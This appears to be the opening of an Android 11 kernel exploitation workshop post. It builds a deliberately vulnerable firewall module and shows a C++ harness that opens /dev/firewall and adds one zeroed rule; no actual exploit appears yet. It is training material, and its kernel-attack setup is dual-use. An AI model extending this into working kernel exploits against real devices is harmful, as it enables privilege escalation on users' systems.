Android 11 Kernel Exploitation Workshop

I booted up an Android kernel, as I mentioned here.

The branch name is android11-5.4.

The kernel is compiled.

We used wall-of-perdition’s vulnerable firewall module as the exploitation target.

We ran make in the compiled kernel directory to build the firewall module,

then fetched it with wget and loaded it with insmod. The result is:

I added a rule to the firewall for testing purposes.

#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#include <iostream>
using namespace std;

// ioctl request codes understood by the firewall module. They are raw constants
// (not _IO*-encoded numbers), so their values must match the module's own source exactly.
#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad

typedef unsigned int u32;   // kernel-style alias, used for Exp::stage below

// Rule record exchanged with the firewall module through the ioctls above.
// NOTE(review): field order and widths must match the module's definition byte for
// byte — confirm against the module source. Instances should be zero-initialised
// before being passed to ioctl, otherwise stack contents are handed to the kernel.
typedef struct
{
    char iface[16];     // interface name
    char name[16];      // rule name
    char ip[16];        // address (presumably text form — verify against the module)
    char netmask[16];   // netmask (same caveat as ip)
    uint8_t idx;        // rule index (presumably the slot the module stores it in — verify)
    uint8_t type;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    #ifdef EASY_MODE
    char desc[DESC_MAX];   // DESC_MAX is not defined in this listing; EASY_MODE builds need it
    #endif
} user_rule_t;

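// Print "Error <buff>" when a syscall result is negative; otherwise stay silent.
// Not constexpr: the body performs stream I/O, so it can never be constant-evaluated,
// which makes a constexpr definition ill-formed (clang rejects it outright).
//   buff: short label for the call being checked (e.g. "open").
//   fd:   the return value to check; any negative value is treated as an error.
void errcheck(const char* buff, int fd)
{
    if (fd < 0) {
        std::cout << "Error " << buff << std::endl;
    }
}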

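struct Exp{

        u32 stage{ 0 };   // exploitation stage counter; stage1() does not advance it

        // Stage 1: open the firewall device and submit one all-zero rule via ADD_RULE.
        // Bails out if the device cannot be opened, so an invalid fd never reaches ioctl,
        // and always closes the descriptor it opened.
        void stage1()
        {
                int fd = open("/dev/firewall",O_RDONLY);
                errcheck("open",fd);
                if (fd < 0) {
                        return;
                }

                // Zero-initialise: an uninitialised struct would pass whatever happens to be
                // on the stack to the kernel as the rule's fields.
                user_rule_t rule1{};

                // Check the ioctl status the same way as open's.
                int rc = ioctl(fd,ADD_RULE,&rule1);
                errcheck("ioctl",rc);

                close(fd);
        }
};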

// Entry point: run the first stage of the workshop against the firewall device.
int main(){
        Exp exp{};
        exp.stage1();
        return 0;
}

We can interact with the firewall.

Well let’s start.

